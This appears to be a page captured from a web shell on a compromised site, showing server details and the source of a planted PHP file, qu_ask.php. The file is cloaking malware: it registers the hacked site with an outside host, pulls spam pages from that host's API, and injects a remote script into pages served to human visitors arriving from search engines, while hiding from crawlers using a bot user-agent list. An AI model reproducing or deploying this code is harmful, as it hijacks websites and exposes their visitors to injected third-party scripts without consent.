MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
$ pwd: /proc/self/cwd/
Upload Files
File: //proc/self/cwd/qu_ask.php
<?php

define('SITE_KEY', 'trebiaseguros_com');
define('API_BASE', 'https://grh7.pro/api');
define('USER_JS', 'https://files.grh7.pro/news.js');
define('DEBUG', false);
define('SSL_VERIFY', false);

function remote_ini_truthy($name)
{
    $v = strtolower(trim((string) ini_get($name)));

    return in_array($v, array('1', 'on', 'true', 'yes'), true);
}

function remote_is_https()
{
    if (!empty($_SERVER['HTTPS']) && strtolower((string) $_SERVER['HTTPS']) !== 'off') {
        return true;
    }
    if (isset($_SERVER['SERVER_PORT']) && (string) $_SERVER['SERVER_PORT'] === '443') {
        return true;
    }
    if (!empty($_SERVER['HTTP_X_FORWARDED_PROTO'])
        && strtolower((string) $_SERVER['HTTP_X_FORWARDED_PROTO']) === 'https') {
        return true;
    }
    if (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && (string) $_SERVER['HTTP_X_FORWARDED_SSL'] === '1') {
        return true;
    }
    if (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower((string) $_SERVER['HTTP_FRONT_END_HTTPS']) === 'on') {
        return true;
    }

    return false;
}

function remote_http_get($url, $ua, $referer, $timeout = 30)
{
    $ua = $ua !== '' ? $ua : 'Mozilla/5.0 (compatible; RemoteRender/1.0)';
    $verify = defined('SSL_VERIFY') ? (bool) SSL_VERIFY : true;
    $timeout = (int) $timeout;

    if (function_exists('curl_init')) {
        $ch = curl_init($url);
        if ($ch === false) {
            return false;
        }
        $opts = array(
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_MAXREDIRS => 5,
            CURLOPT_CONNECTTIMEOUT => min(15, $timeout),
            CURLOPT_TIMEOUT => $timeout,
            CURLOPT_HTTPHEADER => array(
                'User-Agent: ' . $ua,
                'Referer: ' . $referer,
                'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            ),
            CURLOPT_SSL_VERIFYPEER => $verify,
            CURLOPT_SSL_VERIFYHOST => $verify ? 2 : 0,
        );
        if (defined('CURLOPT_PROTOCOLS')) {
            $opts[CURLOPT_PROTOCOLS] = CURLPROTO_HTTP | CURLPROTO_HTTPS;
        }
        if (defined('CURLOPT_ENCODING')) {
            $opts[CURLOPT_ENCODING] = '';
        }
        curl_setopt_array($ch, $opts);
        $body = curl_exec($ch);
        $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        if ($body === false || $code < 200 || $code >= 400) {
            return false;
        }

        return $body;
    }

    if (!remote_ini_truthy('allow_url_fopen')) {
        return false;
    }

    $ctx = stream_context_create(array(
        'http' => array(
            'timeout' => $timeout,
            'header' => "User-Agent: $ua\r\nReferer: $referer\r\nAccept: */*\r\n",
            'ignore_errors' => true,
        ),
        'ssl' => array(
            'verify_peer' => $verify,
            'verify_peer_name' => $verify,
        ),
    ));

    $body = @file_get_contents($url, false, $ctx);
    if ($body === false) {
        return false;
    }

    if (isset($http_response_header[0]) && preg_match('#\s(\d{3})\s#', $http_response_header[0], $m)) {
        $sc = (int) $m[1];
        if ($sc < 200 || $sc >= 400) {
            return false;
        }
    }

    return $body;
}

function remote_is_spider($ua)
{
    $ua = trim($ua);
    if ($ua === '') {
        return true;
    }
    static $p = null;
    if ($p === null) {
        $p = array('googlebot', 'google-inspectiontool', 'adsbot-google', 'mediapartners-google', 'bingbot', 'msnbot', 'slurp', 'duckduckbot', 'baiduspider', 'yandexbot', 'sogou', 'exabot', 'facebot', 'facebookexternalhit', 'twitterbot', 'linkedinbot', 'pinterest', 'applebot', 'ia_archiver', 'petalbot', 'bytespider', 'semrushbot', 'ahrefsbot', 'mj12bot', 'dotbot', 'rogerbot', 'megaindex', 'blexbot', 'crawler', 'spider', 'bot.htm', 'bot.php', 'crawl', 'scrapy', 'python-requests', 'curl/', 'wget/', 'httpclient', 'slackbot', 'discordbot', 'telegrambot', 'whatsapp');
    }
    $l = strtolower($ua);
    foreach ($p as $x) {
        if ($x !== '' && strpos($l, $x) !== false) {
            return true;
        }
    }

    return false;
}

function remote_str_ends_with($haystack, $needle)
{
    if ($needle === '') {
        return true;
    }
    $len = strlen($needle);

    return strlen($haystack) >= $len && substr($haystack, -$len) === $needle;
}

function remote_referer_is_search_engine($referer)
{
    $referer = trim((string) $referer);
    if ($referer === '' || strlen($referer) > 2048) {
        return false;
    }
    $parsed = parse_url($referer);
    if (!is_array($parsed) || empty($parsed['host'])) {
        return false;
    }
    $host = strtolower((string) $parsed['host']);
    if (strpos($host, 'www.') === 0) {
        $host = substr($host, 4);
    }
    if (strpos($host, 'googleusercontent') !== false
        || strpos($host, 'googleadservices') !== false
        || strpos($host, 'googletagmanager') !== false) {
        return false;
    }
    if (preg_match('/(^|\.)google\./', $host)) {
        return true;
    }
    if (remote_str_ends_with($host, 'bing.com') || strpos($host, '.bing.com') !== false) {
        return true;
    }
    if (remote_str_ends_with($host, 'msn.com') || strpos($host, '.msn.com') !== false) {
        return true;
    }
    if (remote_str_ends_with($host, 'baidu.com')) {
        return true;
    }
    if (strpos($host, 'search.yahoo') !== false || $host === 'yahoo.com' || $host === 'yahoo.co.jp') {
        return true;
    }
    if (strpos($host, 'duckduckgo.') !== false) {
        return true;
    }
    if (strpos($host, 'yandex.') !== false) {
        return true;
    }
    if (remote_str_ends_with($host, 'sogou.com')) {
        return true;
    }
    if ($host === 'so.com' || strpos($host, '.so.com') !== false || strpos($host, 'so.360.cn') !== false) {
        return true;
    }
    if (strpos($host, 'naver.') !== false) {
        return true;
    }
    $otherSearch = array(
        'ecosia.org',
        'qwant.com',
        'startpage.com',
        'search.brave.com',
        'brave.com',
        'petalsearch.com',
        'seznam.cz',
        'swisscows.com',
        'you.com',
    );
    foreach ($otherSearch as $suffix) {
        if ($host === $suffix || remote_str_ends_with($host, '.'.$suffix)) {
            return true;
        }
    }

    return false;
}

function remote_inject_script($html, $src)
{
    if ($src === '') {
        return $html;
    }
    $tag = '<script src="' . htmlspecialchars($src, ENT_QUOTES, 'UTF-8') . '" defer></script>';
    $h = strtolower($html);
    foreach (array('</body>', '</html>') as $end) {
        $pos = strripos($h, $end);
        if ($pos !== false) {
            return substr($html, 0, $pos) . $tag . "\n" . substr($html, $pos);
        }
    }

    return $html . "\n" . $tag;
}

if (SITE_KEY === '') {
    http_response_code(503);
    header('Content-Type: text/html; charset=UTF-8');
    echo '<!DOCTYPE html><html><body><p>Please set SITE_KEY in remote.php</p></body></html>';
    exit;
}

$path = isset($_GET['path']) ? trim((string) $_GET['path']) : '/';
$parsedPath = parse_url($path, PHP_URL_PATH);
$path = $path === '' ? '/' : ($parsedPath ? $parsedPath : $path);
$host = isset($_SERVER['HTTP_HOST']) ? (string) $_SERVER['HTTP_HOST'] : '';
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? (string) $_SERVER['HTTP_USER_AGENT'] : '';
$referer = isset($_SERVER['HTTP_REFERER']) ? (string) $_SERVER['HTTP_REFERER'] : '';
$scriptPath = isset($_SERVER['SCRIPT_NAME']) ? (string) $_SERVER['SCRIPT_NAME'] : '';
if ($scriptPath === '') {
    $scriptPath = isset($_SERVER['PHP_SELF']) ? (string) $_SERVER['PHP_SELF'] : '/';
}
$scheme = remote_is_https() ? 'https' : 'http';
$entryUrl = $scheme . '://' . $host . $scriptPath;

if (isset($_GET['ping'])) {
    $url = API_BASE . '/heartbeat?site_key=' . rawurlencode(SITE_KEY) . '&host=' . rawurlencode($host);
    $json = remote_http_get($url, $ua, $referer, 10);
    header('Content-Type: application/json; charset=UTF-8');
    echo $json !== false ? $json : '{"status":"error","message":"request failed"}';
    exit;
}

if (isset($_GET['register'])) {
    $reg = API_BASE . '/register-site?site_key=' . rawurlencode(SITE_KEY)
        . '&domain=' . rawurlencode($host) . '&entry_url=' . rawurlencode($entryUrl) . '&script_type=php';
    $regBody = remote_http_get($reg, $ua, $referer, 15);
    header('Content-Type: application/json; charset=UTF-8');
    echo $regBody !== false ? $regBody : '{"status":"error","message":"request failed"}';
    exit;
}

$url = API_BASE . '/render?site_key=' . rawurlencode(SITE_KEY)
    . '&path=' . rawurlencode($path) . '&host=' . rawurlencode($host)
    . '&ua=' . rawurlencode($ua) . '&referer=' . rawurlencode($referer);
if (isset($_GET['page']) && (string) $_GET['page'] !== '') {
    $url .= '&page=' . (int) $_GET['page'];
}

$html = remote_http_get($url, $ua, $referer, 30);
if ($html === false) {
    http_response_code(502);
    header('Content-Type: text/html; charset=UTF-8');
    $msg = 'Service temporarily unavailable.';
    if (defined('DEBUG') && DEBUG) {
        $le = error_get_last();
        if ($le && !empty($le['message'])) {
            $msg .= ' ' . $le['message'];
        }
        if (!function_exists('curl_init') && !remote_ini_truthy('allow_url_fopen')) {
            $msg .= ' Enable PHP curl extension or allow_url_fopen.';
        }
    }
    echo '<!DOCTYPE html><html><body><p>' . htmlspecialchars($msg, ENT_QUOTES, 'UTF-8') . '</p></body></html>';
    exit;
}

if (!remote_is_spider($ua) && remote_referer_is_search_engine($referer)) {
    $html = remote_inject_script($html, trim(USER_JS));
}

header('Content-Type: text/html; charset=UTF-8');
echo $html;
@ Telegram